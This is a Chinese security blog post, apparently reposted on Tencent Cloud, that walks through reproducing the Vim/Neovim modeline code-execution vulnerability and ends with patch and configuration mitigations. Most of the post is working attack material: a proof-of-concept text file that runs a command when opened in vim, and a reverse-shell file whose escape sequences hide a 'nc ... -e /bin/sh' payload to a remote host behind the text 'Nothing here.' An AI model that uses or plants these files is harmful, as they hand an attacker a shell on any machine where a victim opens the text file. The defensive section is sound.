专栏首页渗透云笔记丢给你一个txt并同时获取你shell

丢给你一个txt并同时获取你shell

听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。

git clone https://github.com/numirias/security.git

0x01:复现

1、kali复现

桌面新建立一个poc.txt放入以下代码,并用vim执行。

代码:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

效果图:

成功执行

反弹shell脚本

新建立一个shell.txt放入以下代码,Ip跟端口改成你自己的,并用vim执行。

代码:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 192.168.124.14 6666 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

执行后报错:

提示:处理模型行时检测到错误!!

处理方式:

在50行这里添加一个“set modeline” 然后esc保存退出,然后执行

source ~/.vimrc让它生效。

本地开启监听

kali用vim执行txt

本机得到shell

0x02:防范

  • Vim补丁8.1.1365 https://github.com/vim/vim/commit/5357552
  • Neovim补丁(在v0.3.6中发布) https://github.com/neovim/neovim/pull/10082 https://github.com/neovim/neovim/releases/tag/v0.3.6

除了修补之外,建议在vimrc(set nomodeline)中禁用model,使用securemodelines 插件,或者禁用modelineexpr(因为补丁8.1.1366,仅限Vim)以禁用model中的表达式。

本文分享自微信公众号 - 渗透云笔记(shentouyun)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-06-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 网络安全自学篇(十四)| Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)

    免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转...

    天钧
  • Python笔记(第三章)

    什么是元组,元组的理解成一个不可进行更改的列表,换个理解方式,如列表申请的元素,可以看见并进行修改等一定的高级操作,但是元组不一样它更像申请了一张可视的图片,可...

    天钧
  • 对HTTP与HTTPS学习的笔记

    HTTP协议:Hypertext Transfer Protocol,超文本传输协议,现在普遍的版本为1.1版本

    天钧
  • 丢给你一个txt并同时获取你shell

    听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。

    洛米唯熊
  • httprunner 2.x学习1-环境与登录接口案例

    由于之前写过一个 httprunner 系列是针对 1.5.8 版本写的教程, httprunner版本更新的还挺快的,最近已经到3.x版本了,看了下改动还是挺...

    上海-悠悠
  • 使用nodejs将某个简书用户的文章进行导出

    今天Jerry发现简书改版后,以前根据问题标题进行搜索的功能消失了,这样我搜索自己过去发表的文章就不太方便。因此,我想写个小程序,把自己过去发表的文章的标题和超...

    Jerry Wang
  • 机器学习、人工智能与网络安全的未来

    机器学习(ML)和人工智能(AI)与大多数人想象的不太一样,既不像《星球大战》中憨态可掬的R2-D2,也不像蠢萌的机器人瓦力,今天的机器人、复杂算法和超大型计算...

    刀刀老高
  • 机器学习、人工智能与网络安全的未来

    如果不是因为黑客也同样拥抱了这些技术,AI和ML真有可能成为网络安全团队真正的游戏规则改变者。这意味着,尽管AI和ML在网络安全解决方案中占比越来越大,它们却也...

    安恒信息
  • 工作流生成图片乱码(�PNG)

    如果你不设置response的contentType,发现reponse的响应头中 Content-Type 为 application/json ,响应按照j...

    挑战者
  • 区块链技术公司谈区块链与AI结合

    一般人听到区块链与AI觉得这是这个事情应该没什么关系,因为区块链和AI分别属于是技术谱系的两个极端:一个是在封闭数据平台上培育中心化的智能,另一个则是在开放数据...

    qq2398788267

扫码关注云+社区

领取腾讯云代金券